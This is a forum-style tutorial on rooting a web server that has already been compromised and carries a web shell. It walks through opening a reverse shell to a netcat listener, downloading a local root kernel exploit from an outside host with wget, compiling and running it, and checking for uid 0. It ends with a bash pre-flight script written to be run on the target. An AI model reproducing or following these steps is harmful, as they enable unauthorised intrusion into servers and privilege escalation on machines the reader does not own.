Sometimes people ask JRH how to root a server, so here is a complete tutorial. I tested it first on a site, but only tested, since I don't like to deface: I work as a web developer myself and know how hard it is to build a website.
Now let's start:
Requirements for this tutorial:
- A shelled website.
- NetCat installed on your computer.
- Patience
- A port (443, or any other than 80) forwarded on your router to your computer.
Okay, first let's navigate to our shell.
If the shell is GNY, you will see something like 'Back Connect'.
Go there. You will see three textboxes.
Choose backconnect (not 'bind to /bin/sh').
Type in your IP and the port you want the server to connect back to (it must be forwarded on your router).
Do not press backconnect yet.
Download NetCat.
Extract the files into a folder on your desktop. Then go to Run > cmd to open a command prompt.
Now type:
cd <path to netcat>
Replace <path to netcat> with the folder you extracted netcat into. Okay, now type:
nc -lnvp <port>
Replace <port> with the port you forwarded and entered in the shell.
It should display something like this:
listening on [any] <port> ...
Minimize this window and go back to the web shell.
Type in your IP address and port and click backconnect.
If you did everything right, the server can make outbound connections (no egress firewall; this is why 443 is a good choice, as outbound HTTPS is almost always allowed) and your port forwarding is correct, you will see an incoming connection from the server. You have a shell!
Type id to see which user you are running as.
Say your uid is 23, the web server's account. You control only your website, but not for long. Type uname -a and you get the full kernel version.
Copy it and google for local root exploits matching that exact version.
Say it is 2.6.18 from 2008... pretty outdated! Let's exploit it. cd to /tmp, which is world-writable. One caveat: /tmp is often mounted noexec, and then a binary compiled there will not run; check the mount options first and use /var/tmp or /dev/shm if it is.
Type this:
cd /tmp
Now let's make a folder for the exploit.
mkdir exploit
cd into this folder.
cd exploit
Now comes the tricky part. We will use the h00lyshit exploit for this kernel. Before you use it, read the header comments of localroot.c: a local root exploit is written for a specific range of kernel versions, and running it against another version usually just fails or crashes the box. Read the rest of the source too, since you are about to run code from a random file host as your web user, and 'exploits' shipped with backdoors are not unusual. Type:
wget http://goodbye.fileave.com/localroot.c
Now type 'ls'. You should see localroot.c in this folder. We need to compile it.
Type:
gcc localroot.c -o h00lyshit
Now type ls and you should see two files, localroot.c and h00lyshit. h00lyshit requires a large file on the server in order to get root, so let's create one. Type this and hit enter:
dd if=/dev/urandom of=largefile count=2M
This creates largefile: 2M blocks of 512 bytes, i.e. 1 GiB, so make sure /tmp has that much free space. Filling it from /dev/urandom can take up to 5 minutes. Once it is done, make the files executable; the tutorial sets 777 on both (only +x on h00lyshit is actually needed):
chmod 777 h00lyshit
chmod 777 largefile
Now let's run the exploit! Type this:
./h00lyshit largefile
Now wait about 3 minutes. If the kernel is unpatched and the version is right, you are root! Type id and you will see:
uid=0(root)
You have successfully gained root!
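As an added example that is not part of the original tutorial (and not the exploit author's code), the following bash script does the pre-flight checks the steps above skip: it reads the uid and kernel release, compares the release against the version range stated in the exploit's header (EXPLOIT_MIN and EXPLOIT_MAX are placeholders to fill in from that header), finds a candidate directory whose filesystem is not mounted noexec, and checks for gcc and disk space. The /proc/mounts sample inside it is constructed, not captured from a real host.

```shell
#!/bin/bash
# Pre-flight checks before running a local root exploit from a web-user shell.
# Added example, not from the original tutorial. EXPLOIT_MIN/EXPLOIT_MAX are
# placeholders: copy the supported kernel range from the exploit's header.
EXPLOIT_MIN=2.6.13
EXPLOIT_MAX=2.6.17

# Strip "2.6.18-92.el5" down to the dotted numeric part, "2.6.18".
kernel_base() {
    printf '%s\n' "${1%%[!0-9.]*}"
}

# Compare two dotted numeric versions field by field; print -1, 0 or 1.
vercmp() {
    local a=$1 b=$2 x y
    while [ -n "$a" ] || [ -n "$b" ]; do
        x=${a%%.*}; x=${x:-0}
        y=${b%%.*}; y=${y:-0}
        if [ "$x" -lt "$y" ]; then printf '%s\n' -1; return; fi
        if [ "$x" -gt "$y" ]; then printf '%s\n' 1; return; fi
        case $a in *.*) a=${a#*.} ;; *) a= ;; esac
        case $b in *.*) b=${b#*.} ;; *) b= ;; esac
    done
    printf '%s\n' 0
}

# True when the kernel release falls inside [min, max] inclusive.
kernel_in_range() {
    local base
    base=$(kernel_base "$1")
    [ "$(vercmp "$base" "$2")" -ge 0 ] && [ "$(vercmp "$base" "$3")" -le 0 ]
}

# Mount options of the filesystem holding directory $2, from /proc/mounts-style
# text in $1. Longest matching mountpoint wins; for the same mountpoint a later
# line beats an earlier one, as stacked mounts do.
mount_opts_for() {
    printf '%s\n' "$1" | awk -v d="$2" '
        BEGIN { best = -1 }
        $2 == d || $2 == "/" || index(d, $2 "/") == 1 {
            if (length($2) >= best) { best = length($2); opts = $4 }
        }
        END { print opts }'
}

# True when a comma-separated mount option string contains noexec.
is_noexec() {
    case ",$1," in *,noexec,*) return 0 ;; esac
    return 1
}

# First candidate directory whose filesystem is not noexec, else failure.
pick_exec_dir() {
    local mounts=$1 d
    shift
    for d in "$@"; do
        if ! is_noexec "$(mount_opts_for "$mounts" "$d")"; then
            printf '%s\n' "$d"
            return 0
        fi
    done
    return 1
}

# Constructed /proc/mounts sample (not from a real host): /tmp is a noexec
# tmpfs, /var (and therefore /var/tmp) is a plain ext3 mount.
SAMPLE_MOUNTS='rootfs / rootfs rw 0 0
/dev/sda1 / ext3 rw,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec 0 0
/dev/sda2 /var ext3 rw 0 0'

# Live checks on the box you have the shell on: bash rootcheck.sh run
main() {
    local rel mounts dir
    rel=$(uname -r)
    mounts=$(cat /proc/mounts)
    printf 'uid: %s\nkernel: %s\n' "$(id -u)" "$rel"
    if kernel_in_range "$rel" "$EXPLOIT_MIN" "$EXPLOIT_MAX"; then
        echo "kernel is inside the exploit's stated range $EXPLOIT_MIN..$EXPLOIT_MAX"
    else
        echo "kernel is OUTSIDE $EXPLOIT_MIN..$EXPLOIT_MAX: find an exploit for this version instead"
    fi
    if command -v gcc >/dev/null 2>&1; then
        echo "gcc: present"
    else
        echo "gcc: missing, compile on your own box for the same arch and libc"
    fi
    if dir=$(pick_exec_dir "$mounts" /tmp /var/tmp /dev/shm); then
        if [ -w "$dir" ]; then
            echo "work dir: $dir (writable, not noexec)"
        else
            echo "$dir is not noexec but is not writable for uid $(id -u)"
        fi
    else
        echo "/tmp, /var/tmp and /dev/shm are all noexec: a binary will not run from them"
    fi
    # The tutorial's dd line writes 2M x 512-byte blocks, i.e. 1 GiB; check it fits.
    df -h "${dir:-/tmp}"
}

case ${1-} in run) main ;; esac
```

Run it as bash rootcheck.sh run on the target once the back-connect shell is up; without the argument it only defines the functions. If the kernel is outside the range the exploit documents, stop and look for a matching exploit rather than running this one and risking a kernel panic that ends your session.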
Collected.